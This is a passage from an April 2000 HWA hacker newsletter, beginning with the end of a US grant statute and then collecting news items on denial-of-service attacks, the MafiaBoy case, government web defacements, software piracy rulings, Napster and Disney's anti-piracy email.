Enforcement Block Grant program (described under the heading ``Violent Crime Reduction Programs, State and Local Law Enforcement Assistance'' of the Departments of Commerce, Justice, and State, the Judiciary, and Related Agencies Appropriations Act, 1998 (Public Law 105-119)). (d) Matching Funds.--The Federal share of a grant received under this section may not exceed 90 percent of the total cost of a program or proposal funded under this section unless the Attorney General waives, wholly or in part, the requirements of this subsection. (e) Authorization of Appropriations.-- (1) In general.--There is authorized to be appropriated to carry out this section $25,000,000 for each of fiscal years 2000 through 2003. (2) Limitations.--Of the amount made available to carry out this section in any fiscal year not more than 3 percent may be used by the Attorney General for salaries and administrative expenses. (3) Minimum amount.--Unless all eligible applications submitted by any State or units of local government within a State for a grant under this section have been funded, the State, together with grantees within the State (other than Indian tribes), shall be allocated in each fiscal year under this section not less than 0.75 percent of the total amount appropriated in the fiscal year for grants pursuant to this section, except that the United States Virgin Islands, American Samoa, Guam, and the Northern Mariana Islands each shall be allocated 0.25 percent. (f) Grants to Indian Tribes.--Notwithstanding any other provision of this section, the Attorney General may use amounts made available under this section to make grants to Indian tribes for use in accordance with this section. 
______

@HWA

93.0 [HNN] PSINet Hit with DoS Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by acopalyse

A denial-of-service attack on PSINet Hong Kong on Wednesday disabled the Internet service provider's Web-hosting servers for most of the day, leaving many of its dotcom customers without e-mail and Web sites. However, more than a day after the attack took place, the ISP was still unable to determine whether it was the result of an outside attacker or an internal blunder.

Technology Post
http://www.technologypost.com/internet/Daily/20000420194747504.asp?Section

Published on Thursday, April 20, 2000

INTERNET

PSINet hit by denial-of-service attack

NEIL ART

--------------------------------------------------------------------------------

Updated at 8.55pm:

A denial-of-service attack on PSINet Hong Kong on Wednesday disabled the Internet service provider's Web-hosting servers for most of the day, leaving many of its dotcom customers without e-mail and Web sites.

However, more than a day after the attack took place, the ISP was still unable to determine whether it was the result of an outside hacker or an internal blunder.

William Kwan, president PSINet Hong Kong, said "unusual amounts of traffic were generated by a desktop computer through the network", which might have been caused by a programmer checking data traffic.

A denial-of-service attack is one in which a large volume, or packets, of information are continually sent to a network server, disrupting network connectivity because the server is unable to answer the demand.

"We don't know what caused the large volume of traffic," Mr Kwan said, adding that the company had not contacted the police.

The attack started around 1.45pm on Wednesday, PSINet said, adding that its leased-line network was partially restored in two hours and fully restored by 7pm. However, PSINet's dial-up network was still experiencing problems as late as midnight, according to some of its customers.
Clients said their e-mail services and Web sites were down for most of the day.

Dennis Skouse, managing director Spin Design and Advertising, said he came to work around 9.30am to find his e-mail box missing. His computer gave him a message that it could not locate the server. He said his company "absolutely relied" on e-mail to "send PDF [portable document format] files all over the place for [client] approval".

Mr Skouse said that throughout the day he was sporadically able to access and check his e-mail. He said it was bad timing because many people were leaving Hong Kong for the Easter holiday and wanted to finalise designs with his firm before doing so.

David Croasdale, business director Newell Public Relations, said the company was off-line from mid-morning for most of the day. "We rely a lot on e-mail to keep in touch with clients," he said. "Our clients rely on Newell to get their messages out."

Newell founder Stuart Newell said: "The whole office felt completely out of touch. Potentially, it could have a serious effect on business in Hong Kong."

Advedi, a Web and e-mail services company, was also adversely affected, as were many of its clients, said Patrick Ceulemans, co-founder and director of Advedi. "Basically, we are out of business as well as our clients," he said, adding, however, that his company was able to re-establish service with another ISP.

"It was down for at least two hours that I know of," said Mr Ceulemans. "It is unfortunate, but this is life." He said he had e-mailed PSINet, but it had not responded. "There should be some system in place to notify clients, so that they in turn may take appropriate action," said Mr Ceulemans.

PSINet declined to comment on the disruption to its services when contacted on Wednesday night, but issued a brief statement on Thursday. It said the disruption of service was due to PSINet's sharing of an internal PC network with that of the customer network.

"Remedial actions have been taken immediately by relocating and reconfiguring our internal network. We will do our utmost to minimise similar problems from occurring in the future."

@HWA

94.0 [HNN] Satellite Jammer Plans on Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Odin

With $7500 in spare parts and plans found on the Internet a US Air Force team built what they say can successfully jam satellite signals. Unfortunately they didn't give the effective range of the jamming device or the URL to the plans.

New Scientist
http://www.newscientist.com/news/news_223528.html

(Shit, not found, anyone have this or any other details email me! - Ed)

@HWA

95.0 [HNN] GNIT Vulnerability Scanner Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by m0nk

The GNIT Vulnerability Scanner has been almost completely redesigned from the ground up to perform a scan for open ports. Many new functions have been added to this new release of GNIT, including the great new feature of a custom generated html output after a scan has been run. Only for Windows NT or 2000.

ellicit.org
http://security.ellicit.org

@HWA

96.0 [HNN] Free MafiaBoy
~~~~~~~~~~~~~~~~~~~

contributed by Bigfoot

Someone has set up a 'Free MafiaBoy' web site.

Free MafiaBoy
http://www.geocities.com/freemafiaboy/

@HWA

97.0 [HNN] MafiaBoy News Roundup
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 24th

contributed by ATKeiper and TwiLyght

While the saga of Elian Gonzalez played out in the popular media over the weekend the tech reporters were busy trying to find a new angle on the MafiaBoy arrest last week. MafiaBoy has been charged in Canada with initiating a denial of service attack against CNN. MafiaBoy's lawyer has said that they expect a long, complex and technical trial. (Hopefully this means that he will not be pleading out.)
Washington Post

Canadian police said on Saturday they had charged MafiaBoy's father with conspiring with another man to commit assault.
Evidence for the charges was gathered by using the wiretaps originally placed to gather evidence on the boy.
Reuters - via Go2net

The Free MafiaBoy web site has supposedly been threatened with a lawsuit by the lawyers for relatives of Michael Lyle. Michael Lyle claims to have had IRC conversations with MafiaBoy prior to his arrest.
Free MafiaBoy

The Toronto Star ran a rather interesting political cartoon regarding MafiaBoy yesterday.
The Toronto Star

http://www.washingtonpost.com/wp-dyn/business/A53181-2000Apr20.html
http://www.go2net.com/headlines/general/20000422/186850.html
http://www.geocities.com/freemafiaboy/
http://www.thestar.com/thestar/back_issues/ED20000423/opinion/20000423NEW02x_ED-CARTOON.html

@HWA

98.0 [HNN] Members of HV2k Raided
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 24th

contributed by at033

HV2k aka High Voltage 2000 appears to have been raided in relation to several Canadian and US government defacements. SLiPY was raided in late January by DND, NIS and the RCMP. The next day eg0death (Bleeding Angel) was arrested by the US authorities in Texas. The current status of eg0death, who was also in Global Hell, and SliPY is unclear at this time. Someone calling themselves HV2k defaced the web server of the US DHHS last Friday evening with a message "HV2k won't die". HV2K is credited with defacing the same server on 11/2/99.

Ottawa Citizen - This article gives almost no information
Attrition.org - List of Over 50 Defacements Attributed to HV2k

http://www.ottawacitizen.com/hightech/000327/3825256.html
http://www.attrition.org/mirror/attrition/hV2ka.html

Cyber-mischief shows potential for damaging future attacks

Online terrorists, criminals likely to target vital infrastructure systems

David Pugliese
The Ottawa Citizen

His alias is hV2k and he's a hacker who specializes in breaking into military and government computers.

HV2k is the Internet name of the person who entered the Department of National Defence's Web page on Nov. 1.
Within a period of five days, hV2k -- also known as "slipy" -- broke into 19 military and government computers in Canada and the United States. On his list were the state of Virginia's Sex Offender Registry, the state of New York's tax computer system, the Canadian government's Human Resources Development Department, and four U.S. military computer sites.

A joint Canadian Forces National Investigation Service and RCMP investigation determined the identity of two people involved in the hV2k attacks, one of them being a young offender, but no further details are being released.

But one thing is certain: The Canadian military expects hackers similar to hV2k to come calling again.

"Canada is becoming more and more of a target for hacker-cracker groups as information regarding domestic vulnerabilities becomes known," a Canadian military intelligence report written in November concludes. Expect more intrusions, was the report's basic message.

HV2k simply left his name on the military's Web site, but that action required the department to individually check all its pages on the Internet to see whether they had been altered. It's not known what was done to the U.S. sites.

But security analysts and government officials are concerned there is potential for much more than Web vandalism, especially when computers are put into the hands of terrorists and criminals. A concentrated attack, they worry, could shut down the key infrastructure computers that run everything from the hydro system to telecommunications. The result could be similar to the damage caused by the massive ice storm that paralysed much of Eastern Canada in 1998.

"To me, it's the threat of the future which has to be watched more closely," says Conservative Senator William Kelly, the chairman of the Senate committee on terrorism and public safety. "A cyber-attack is a much cheaper way to interfere with critical infrastructures than it is to drop a nuclear bomb."
The other problem Canada faces is its close links with the U.S., both in economic areas and its computer infrastructure. Any attack on the U.S. is bound to cause a ripple effect into Canada.

"The U.S. has the highest level of technology, and therefore is the most vulnerable to (information operations) attack by state (or) non-state actors," warns another intelligence report compiled in November. "Canada's connectivity with the U.S. also makes it highly vulnerable to (information operations) attacks."

But terrorism expert John Thompson of the Mackenzie Institute in Toronto sees the threat as overblown, at least for now. He says those who are "attacking" government and military systems have been mainly hackers not related to terrorist groups.

"No one has seen a terrorist yet who can do anything beyond hacking a Web page up," Mr. Thompson points out. "It's more of a threat in potential than one that has been realized."

The main problem for terrorist groups, he argues, is in finding competent hackers. "Where is (Osama) bin Laden going to get his hackers?" asks Mr. Thompson, referring to the alleged terrorist leader who is believed to have ordered bombing attacks against U.S. embassies in Africa. "In Afghanistan? I don't think so."

Mr. Kelly acknowledges that many attacks on Canadian computer systems can be classified as more a nuisance than a threat. But he also points out that some of the attacks, while appearing to be minor in nature, are actually probes to test the weaknesses of the systems. That could be a lead-up to more devastating assaults in the future.

In other cases, information has been removed or altered. For example, Immigration Canada's computers have been hacked into by someone operating from Asia and certain records were removed. "I consider that highly dangerous," says Mr. Kelly.

Specialists in information warfare vary in their estimation of how prepared Canada is for a cyber-attack. Col. Randy Alward, commander of the Canadian Forces Information Operations Group, said the military itself has a secure internal computer system. It also has a specialized team that continually tests the security of its systems.

The Armed Forces is also developing a robust information protection capability because it wants to branch out more on the Internet, using it for everything from gathering information on military equipment purchases to booking travel for employees. But to do that it has to make sure that any future Internet connections are secure, so intruders can't use them to slip into the internal computer system.

"We believe we are developing an information protection capability that is fairly good," said Col. Alward. "We're quite comfortable with it, but it is developing."

Other specialists, such as Prakash Bhartia, director general of Defence Research Establishment Ottawa, where advanced work is being conducted into hacker threats, worry that other federal government and commercial computers are open to attack.

"We are pretty vulnerable," acknowledges Mr. Bhartia. So far, he said, Canada has escaped any real damaging attack.

His concern is borne out by intelligence reports. "The vulnerabilities of Canadian critical infrastructure are increasing and recent trends show more attacks aimed at infrastructures," the November report warns.

But Mr. Kelly believes the country is on the right track in preparing for future cyber attacks. He says a lot of progress has been made in both provincial and federal government areas in setting up a system to share information on attacks and determining where the vulnerabilities lie. He believes Canada is ahead of the U.S. in the area of protecting its infrastructure computers and that a national centre to co-ordinate a response to cyber attacks will soon be developed by the government.

"One of the problems we've had all along is the relative lack of concern Canadians have always had about their own security," said Mr. Kelly. "But I think people are gradually becoming more aware of what the risks are."

Those risks, according to the Canadian military intelligence reports, could come in the form of hackers for hire, both for criminal and terrorist groups.

"Many hackers or crackers, including former employees of Eastern Bloc intelligence services, now work on the open market and provide their services to state/non-state actors," one report determined. "Clients include business intelligence firms engaged in industrial espionage as well as criminal organizations intent on outwitting police surveillance or perpetrating electronic frauds."

It points out that the Colombian drug cartel, for instance, has set up a communications system that is difficult for police and western intelligence agencies to break into.

Other groups are operating for more political motives. One such organization, the Hong Kong Blondes, claims to be based in China and is directed by two individuals by the names of Blondie Wong and Lemon LI. An offshoot of that group has been created and dubbed the Yellow Pages. It has threatened to attack the information infrastructure systems in China and the U.S., with the goal of increasing international awareness of human rights abuses in China.

"It seems (the Hong Kong Blondes) was created to demand accountability from western companies that conduct business with (Chinese) organizations who are responsible for the continuing abuses of human rights," one intelligence report noted. The Hong Kong Blondes, it pointed out, are ready to conduct computer attacks on western companies dealing with China.

@HWA

99.0 [HNN] Piracy Legal In Italy, Sort of
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 24th

contributed by TheHex

A judge in Turin has ruled that the copying of commercial software is not a crime as long as it is not done for profit or sold to third parties. The case centered around a Turin businessman who made copies of software for use in his company.
The judge ruled that since the business man did not copy the software for profit he is not guilty of a criminal violation. Microsoft said it was disgusted with the ruling. Wired http://www.wired.com/news/politics/0,1283,35827,00.html Italy: Software Piracy OK, Sorta Reuters 8:00 a.m. Apr. 21, 2000 PDT MILAN -- A judge in Turin has ruled that it is not a crime to copy software as long as it is not done for profit and the pirated copies are not sold to third parties, Italian newspapers reported on Friday. Corriere della Sera and other papers reported the case of a Turin businessman who made copies of word-processing, accounting, and design software for use in his company. But even though he saved money by paying only one license fee, the judge ruled that since he had not sold on the copied software to others, he did not act "for profit." Defense lawyer Claudio Morro told Corriere that the ruling was in line with the law, which specifically said that for criminal rather than civil charges to be brought, the motive for copying the software had to be profit. "My client copied the programs not to sell them to others but only to use them within his company. So in his case there is only the saving on spending," Morro was quoted as saying. "There could still be elements for a civil case, but from a criminal point of view the question is resolved." A Microsoft Italia executive told the paper the company was disgusted by the ruling. "It is clearly the fault of a legislative hole, but also of an excessively technical attitude on the part of the judge who passed the sentence. The judge has made a mistake," Maurizio Bendina, director of Microsoft Italia's small business division, was quoted as saying. Copyright © 1999-2000 Reuters Limited. 
@HWA

100.0 [HNN] Palm VII Considered Security Threat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 24th

contributed by William Knowles

The Lawrence Livermore National Laboratory has banned the Palm VII from its labs due to its potential as a security threat. Lab officials say that they are complying with DOE directives that prohibit devices that can transmit information over radio waves. Officials are afraid that saboteurs may use the PalmVII to transmit classified information outside the lab perimeter.

San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/merc/docs/001887.htm

Deceased url

@HWA

101.0 [HNN] Navy Intranet National Security Risk?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 24th

contributed by William Knowles

The American Federation of Government Employees (AFGE) has charged that the Navy's proposed $10 billion, 360,000 seat intranet is a threat to national security. AFGE says that the Navy has not thoroughly thought out its plan and that awarding the entire contract to one company places a considerable security risk on the proposed Intranet. The Navy claims that the AFGE simply does not understand the complexity of the situation.

Wired
http://www.wired.com/news/politics/0,1283,35713,00.html

Navy Intranet a Security Threat?
by Craig Bicknell
3:00 a.m. Apr. 21, 2000 PDT

The U.S. Navy's plan to build the world's biggest Intranet could create a big security threat and a boondoggle to boot, according to the country's largest federal employees union.

"We're concerned about national security, because the Navy's not able to answer basic questions about how they will protect national security on (the new Intranet), and we're concerned that they're playing a shell game with money," said Brendan Danaher, policy analyst for the 600,000 member-plus American Federation of Government Employees (AFGE).
The union's barrage is the latest attack on the Navy's proposal to build a gargantuan, 360,000-seat Intranet that would unify all of the Navy and Marine Corp's shore-based operations. The Navy plans to award the $10 billion contract for the project to one of four corporate bidders this June -- nine months earlier than originally planned -- reflecting the sea-service's urgency to reap the benefits of modern info-tech. Last month, the United States General Accounting Office testified before Congress that the Navy had rushed the proposal to corporate bidders without properly analyzing how it would be funded and managed, and what effect it would have on military and civilian information technology workers. Since then, embattled Navy representatives have appeared before Congress 53 times to defend their plan. "There's been absolutely no one who questions the need, value, or concept of this Intranet," Navy deputy CIO Ron Turner said. "They just don't understand the math we've put into this." But there's more than a math problem, insists AFGE's Danaher. The Navy's plan to contract out the installation, service, and oversight of the Intranet to a single private company poses an unacceptable national security risk, he said. "We're concerned that private companies will put their interest before national security," Danaher said. "What if that company's ownership changes, or its stock price plummets. Who knows what could happen?" That argument lacks a certain sophistication, according to Turner. "It's a comment made without looking at how we currently operate. The government would like you to believe that we control the networks, but we ride on commercial fiber that someone else operates," he said. Moreover, the Navy currently operates 100-plus separate networks, all with different firewalls and security, all of which have to interconnect. That means 100 points of vulnerability, according to Turner. 
With a unified Intranet, the Navy can deploy one security system and screw it down tight. Security will be improved, not degraded, he insists. There's no budget problem either, Turner said. Funds for the Intranet will come from money already allocated for IT projects, not from the operational coffers that pay for ships to sail and planes to fly, as critics in Congress have charged. Turner attributes the AFGE's attack largely to a self-serving desire to protect union IT jobs that might be threatened by the new Intranet. Some 1,000 civilian IT employees could be displaced by the Intranet, he said, but the Navy will take pains to place them in new positions. Danaher counters that it's not the threat of job losses that concerns the AFGE so much as the Navy's inability to say exactly what jobs might be lost where, and what that says about the broader project. "We don't know, the Navy doesn't know, nobody knows, and that's a symptom of a larger problem," Danaher said. "Our members are people that work for the military and the federal government, and they're concerned about national security and efficiency," he said. "When you look at the history, you see that the Navy is anything but trustworthy when it comes to contract oversight. We're not saying this is a horrible idea, but the way they're going about this is pretty dangerous." The government's accounting office and a number of congressmen share those concerns. "Look, we're not trying to pull the wool over people's eyes," said a weary Turner, who expects to appear before Congress several times in the coming weeks to further detail the Navy's proposal. Meanwhile, barring any direct orders to the contrary, the project will continue full-speed ahead. "Nobody's told us to stop or slow down," Turner said. 
@HWA

102.0 [HNN] Mitnick Upset Over Claims Made by UITA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 24th

contributed by Mitnick_Media

In a press release linked to by HNN last Thursday the Utah Information Technology Group made several claims that Kevin Mitnick feels are in error. In an effort to set the record straight we provide both sides of the story.

HNN Archive for April 2, 2000 Deseret News Mitnick Rebuttal
http://www.hackernews.com/arch.html?042000#2
http://deseretnews.com/dn/view/0,1249,160008642,00.html?

Already printed elsewhere this issue - Ed

@HWA

103.0 [HNN] Holiday Message from Disney Leaked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 24th

contributed by Macki

2600 magazine was recently furnished with a copy of an email sent from Walt Disney CEO, Michael Eisner, to a vast number of Disney employees about DVD piracy.

2600
http://www.2600.com/news/2000/0423.html

A HOLIDAY MESSAGE FROM DISNEY CHIEF
04/23/00

2600 was recently furnished with a copy of an email sent from Walt Disney CEO, Michael Eisner, to a vast number of Disney employees. While 2600 is not mentioned by name, the letter clearly focuses on the issues raised by the lawsuit Disney (and other MPAA members) have filed against us for publishing DeCSS on our website. In one paragraph towards the end of the letter Eisner actually makes our case for us and admits that either DVDs are too expensive and people pirate them, or they are affordable (which they are) and people don't pirate them (which they don't). Our comments are in bold.

Dear Fellow Cast Members:

In several past e-mails, I have written you about the tremendous opportunities represented by the Internet. Today, I offer a caveat. While the Internet continues to present great potential to our company, we first must fully address the issue of piracy. For some reason piracy has been on my mind.
Maybe this is because I keep reading about the seriousness of it, or maybe it is because I know a digital copy of a film is a perfect copy. Or maybe it is because I know that the Internet is a worldwide delivery system honoring no borders. Or maybe it is because I just needed something to speak about at the Variety/Schroeder's entertainment industry conference in New York City 10 days ago. Probably it is a little of all the above. [A digital copy transferred over the Internet is likely to be compressed and far poorer quality than an analog copy.] By "piracy," I'm not talking about the comical characters sailing the high seas at the Pirates of the Caribbean. Rather, I'm talking about an underground of secretive and sequestered pirates of encryption - the hackers who shamelessly assert that anything they can get their hands on is legally theirs. These Internet pirates try to hide behind some contrived New Age arguments of the Internet, but all they are really doing is trying to make a case for Age Old thievery. [Wow that's pretty twisted. "pirates of encryption", who the hell are they? How does one pirate encryption? More so, what does that possibly have to do with people stealing? On top of all that, now 'hackers' is supposed to be synonymous with 'shameless thieving pirates of encryption'? Someone here is shameless, and it ain't us. "When they hack a DVD and then distribute it on the web", yet another jump is made from breaking encryption to PLAY DVDs to distributing it on the web. Funny how they haven't accused ANYONE of doing this. Nor would it make any sense for someone to "hack a DVD" before ripping it as a VCD - since VCDs are usually lower resolution than television.] When they hack a DVD and then distribute it on the web, it is no different than if someone puts a quarter in a newspaper machine and then takes out all the papers, which, of course, would be illegal and morally wrong. 
The pirates will argue that this analogy is unfair, maintaining that all they're doing is cracking a digital code. But, by that standard, it would be justifiable to crack a bank code and transfer the funds from someone else's account into your own. There's just no way around it - theft is theft, whether it is enabled by a handgun or a computer keyboard. [Of course pirates will argue that analogy is unfair - so would anyone with any modicum of critical thinking skills. While we could argue the difference between intellectual property and tangibles like a newspaper, this analogy is irrelevant because no piracy is actually taking place. Normally we wouldn't even feel the need to respond to this, but since he goes on to imply that WE are the "pirates" it seems like a good idea. Eisner speculates that people will maintain that all that was done was the "breaking of the digital code" - he's right. Note that breaking CSS does not involve any stealing or piracy. So then it does not logically follow that by breaking the code someone is also necessarily using it to steal. After all, CSS prevents DVDs from being PLAYED not COPIED, so cracking it is in no way an indication of impending theft.] Of course, piracy has been around a long time. Many of you probably remember a very funny "Seinfeld" episode (I suppose that's redundant - they all were funny, except maybe for the last one) in which Jerry becomes an "auteur" at making illegal copies of movies by videotaping them off the screen at the local multiplex. But, piracy is anything but funny ... especially now that, instead of making one bad quality videotape for sale on the street, these digital pirates could soon be making unlimited numbers of high quality copies available on the Internet. One of the fallacies of the piracy debate is that it's really just a conflict of the pro-technology members of the "New Media" against the anti-technology members of the "Old Media." This characterization couldn't be more wrong. 
At Disney we embrace technology. And we always have. Throughout his career, Walt Disney recognized new technology as the friend of the storyteller. And, at Disney today, we are not only seizing the tremendous possibilities offered by technology in movies, as with "Dinosaur" and "Toy Story," but we are also active participants in the expansion of the Internet with our GO.com family of sites. We intend to continue to devote resources to the Internet ... but not if this requires surrendering the rights to things we own. With this in mind, our company is undertaking a wide-ranging strategy to make the Internet truly safe for intellectual property. This strategy consists of five main elements. First of all, we are turning to our representatives in Washington. Intellectual property rights are really no different from ordinary property rights. If you own something, you expect the government to respect your right to keep it from being stolen. [Ah good, since legislating security away worked so well the first time!] Secondly, we are working with governments around the world to respect our rights. We are actively involved in the Global Business Dialogue on Electronic Commerce, and our company is serving as chair of the Intellectual Property Work Group. The third element is education. Working with The Motion Picture Association of America, we are advocating a more aggressive campaign to make people aware of intellectual property rights on the Internet. Most people are honest and want to do the right thing. But they can't do the right thing if they don't know that they're doing a wrong thing. [Perhaps they should consider gaining a tighter grasp on reality themselves, before being so presumptuous as to educate others on the Internet.] Fourth, we believe that the entertainment industry as a whole should take meaningful technological measures. 
Working in cooperation with technology companies, we need to develop innovative and flexible encryption devices that can stay one step ahead of the hackers. [How about just doing it right the first time? Or better yet, stop infringing on the Fair Use Doctrine, so that people won't NEED to break the encryption!] Our fifth initiative is economic. History has shown that one of the best deterrents to pirated product is providing legitimate product at appropriate prices. In the music industry, we have already seen that people will gladly pay fair prices for legally-produced product even when it can be easily reproduced and unlawful copies can be easily acquired. [This is the best paragraph in the whole damn thing. Michael Eisner is actually admitting that either DVD prices are too high (like in the UK) or that piracy is not a problem because people will buy DVDs anyway - just like they do CDs. He is absolutely correct, we have been saying this all along. It is cheaper to BUY a DVD than it is to pirate it, and you get a nice clean copy complete with goodies. Finally, the truth comes out: PIRACY IS NOT THE ISSUE! Being able to PLAY legally purchased DVDs in the player and country of your choice are the issues! We're so glad Michael Eisner has finally admitted this - maybe now Disney will drop the lawsuit.] With every passing day, I believe we are getting closer to a time when the Internet will become another important revenue stream for the studios. This is what happened with Pay TV in the '70s and with Home Video in the '80s. If we act appropriately and aggressively in combating the pirates, then this could be the dawn of a new era of opportunity for companies that consistently create great entertainment ... and there's one in particular that comes to mind. So that's what has been on my mind the last couple of weeks, that as well as the strong showing of our company, especially at our parks and TV networks. Life is good. Have a nice Easter/Passover Weekend. 
[Lashanah haba'ah b'Federal Court, Mikey]

Michael

@HWA

104.0 [HNN] Attrition Updates Mailing List
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 24th

contributed by McIntyre

Attrition.org has modified their mailing list section to let readers know that even though the main mirror isn't updated on a continual basis, their automated mirror script e-mails the "defaced" lists by default immediately after each mirror is taken along with a URL for the mirror's location. Readers interested in more "instant notification" should sign up today.

Attrition.org
http://www.attrition.org/security/lists.html

@HWA

105.0 [HNN] MafiaBoy's Friends Under Investigation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 25th

contributed by Evil Wench

Authorities have identified three friends of MafiaBoy who are also suspects in the recent DDoS attacks. Authorities are also investigating a small group thought to be based in Israel who have been involved in various online financial crimes in the past. They said they are also still looking at Coolio (Dennis Moran) as a possible suspect.

USA Today
http://www.usatoday.com/life/cyber/tech/cth767.htm

06/07/00- Updated 07:49 PM ET

Hacker's friends may be suspects, too
By Kevin Johnson, USA TODAY

WASHINGTON - Authorities investigating the February attacks on some of the most popular Internet sites are focusing on three close friends of the 15-year-old Canadian boy who was charged earlier this week, a senior U.S. law enforcement official said Thursday.

The three friends of the Montreal computer hacker known as "Mafiaboy" are among several potential suspects identified by authorities in the cyberassaults that temporarily shut down the Web sites of CNN, Yahoo!, Amazon.com and several other media and commercial giants.

Beyond Montreal, authorities are examining the activities of a small group of hackers thought to be based in Israel.
Officials there say the group has been involved in various online financial crimes, some involving stolen credit card numbers. The group is believed to be part of a larger circle of computer users, including Mafiaboy, who have spent time in an Internet chat room called TNT. The chat room is accessible only by password. Investigators also are trying to determine whether Dennis Moran, a 17-year-old New Hampshire hacker known online as "Coolio," was involved in the attacks in February. Moran, who authorities say has boasted of being involved in the attacks, was charged last month in an attack on a Web site run by the Los Angeles Police Department. The unidentified Montreal teenager known as Mafiaboy has been charged only in two attacks against CNN.com, which was shut down for 3 1/2 hours Feb. 8 after it was overloaded with requests. Mafiaboy claimed credit in chat rooms for similar assaults on sites run by Yahoo! and Buy.com. Officials believe Mafiaboy may have been capable of directing all the assaults but doubt that he did. Analysts familiar with the assaults say the software used to wall off access to the CNN Web site on Feb. 8 was different and less sophisticated than that used to paralyze Yahoo! on Feb. 7. Michael Lyle, who runs a software security firm in Palo Alto, Calif., said the attack on CNN involved software commonly found on Internet sites for hackers. "I literally could show you how to do it in three or four hours," he said. The goal is to flood Internet sites with tens of thousands of requests, disguising the source of the assault by routing the requests through high-capacity computers elsewhere. The tactic overloads the targeted Web sites, causing electronic paralysis. Investigators say Mafiaboy orchestrated the attack on CNN.com through computers at the University of California-Santa Barbara. A Canadian law enforcement official said that because of Mafiaboy's age, it is unlikely he would be sent to an adult prison if convicted of "mischief to data." 
If prosecuted and convicted as an adult, the teenager could face up to 20 years in prison. But in Canada's juvenile system, he faces a maximum of two years in a youth detention center if convicted.

Contributing: Deborah Solomon

@HWA

106.0 [HNN] Backdoor Found in Redhat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 25th

contributed by Mr. Big23

Earlier this month Internet Security Systems found a backdoor in RedHat Linux, the problem has been labeled a 'flaw' by RedHat. The company has been contacted and a fix has been issued. RedHat recommends that all users of the most recent distribution who have installed Piranha download and install this patch.

MSNBC RedHat Updates
http://www.msnbc.com/news/399125.asp?0m

@HWA

107.0 [HNN] USC Stands Their Ground
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 25th

contributed by TheHex

The University of Southern California (USC) has reportedly refused to join other universities in blocking MP3 music downloads via Napster. The university made the announcement on Friday in response to a lawsuit filed by Metallica, which named USC, Yale University and Indiana University as defendants in charges alleging the schools allowed students to pirate copyrighted music. The lawsuit has caused both Yale and Indiana U. to implement filters on their networks to prevent Napster use. (Go Trojans!)

NewsBytes Indiana University - Just look at the Spin
http://www.technews.com/pubNews/00/147722.html
http://www.iuinfo.indiana.edu/ocm/releases/napster02.html

IU installs filters preventing use of MP3 music site
April 20, 2000

BLOOMINGTON, Ind. -- Indiana University announced today that it will block all IU network traffic related to a popular MP3 music Web site called Napster.com.

"In the rapidly evolving technology related to the Internet, copyright issues in cyberspace remain unclear," said Christopher Simpson, IU vice president for public affairs and government relations. "We believe Indiana University has no liability by allowing access to sites such as Napster.
We now believe, however, that our faculty, staff and students could incur legal exposure if they use this technology. Until those unresolved legal issues are clarified, it seems prudent to block the site."

Heavy metal band Metallica, E/M Ventures and Creeping Death Music filed a lawsuit last week against Napster, IU and two other colleges contending copyright infringement. While IU does not believe it has any liability to the plaintiffs, the lawsuit prompted a closer look at access issues.

"This issue has received a significant amount of attention in recent days," Simpson said. "It has caused us to focus on the fact that technology has leaped well ahead of clear legal issues. University policy prohibits violation of copyright laws, and we believe strongly in protecting intellectual property. Those are fundamental tenets that we will not abandon."

Simpson said he hopes a long-term solution can be found to ensure individuals can have access to digital music while protecting intellectual property rights.

(Christopher Simpson, 812-855-0850, csimpson@indiana.edu)

@HWA

108.0 [HNN] Critics Chide COPPA - Disney Plan Criticized
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 25th

contributed by root66

The Children's Online Privacy Protection Act (COPPA) is being criticized by web site administrators as being too costly to implement and for encouraging kids to lie about their ages. Disney has said it plans to ask for parents' credit card numbers when verifying parental consent. Mastercard has issued a statement saying that credit cards are not meant to be used for age verification. Disney has said they will go ahead with their plan.
Computer World Children's Online Privacy Protection Act (COPPA)
http://www.computerworld.com/home/print.nsf/all/000424D89E
http://www.ftc.gov/ogc/coppa1.htm

@HWA

109.0 [HNN] Happy CIH Virus Day
~~~~~~~~~~~~~~~~~~~~~~~~~

April 25th

contributed by Bjornar

Last year the CIH virus struck rather hard around the world (or was it just the media hype?). April 26th will be here tomorrow, do you have the latest virus definitions installed? CIH or Chernobyl will attempt to overwrite sectors on the hard drive and also attempt to overwrite BIOS on flash-capable systems.

NAI Virus Description
http://vil.nai.com/villib/dispVirus.asp?virus_k

Dead url

@HWA

110.0 [HNN] AboveNet Hit with DDoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 26th

contributed by Evil Wench

AboveNet Communications has said that it received what it called a 'direct attack' on its infrastructure. Traffic at AboveNet was brought to a standstill for four hours late Tuesday morning. AboveNet has referred the matter to the FBI but says that tracking the attacker should be easier than previous attacks.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2555422,00.html

FBI investigating new Web attack

ISP AboveNet hit by a denial-of-service attack -- blocking customers' Web access for hours. 'It was a direct attack on our infrastructure.'

By Robert Lemos, ZDNet News
UPDATED April 26, 2000 8:18 AM PT

Top-five Internet service provider AboveNet Communications suffered a denial-of-service attack on Tuesday -- raising the specter of another round of Web attacks.

Paul Vixie, senior vice president of Internet services for Metromedia Fiber Network Inc., AboveNet's parent company, said the attack did not resemble February's spate of DoS attacks.

"This was not just a SMURF attack or some other broadcast storm aiming meaningless data at our routers," Vixie said. "It was a direct attack on our infrastructure."

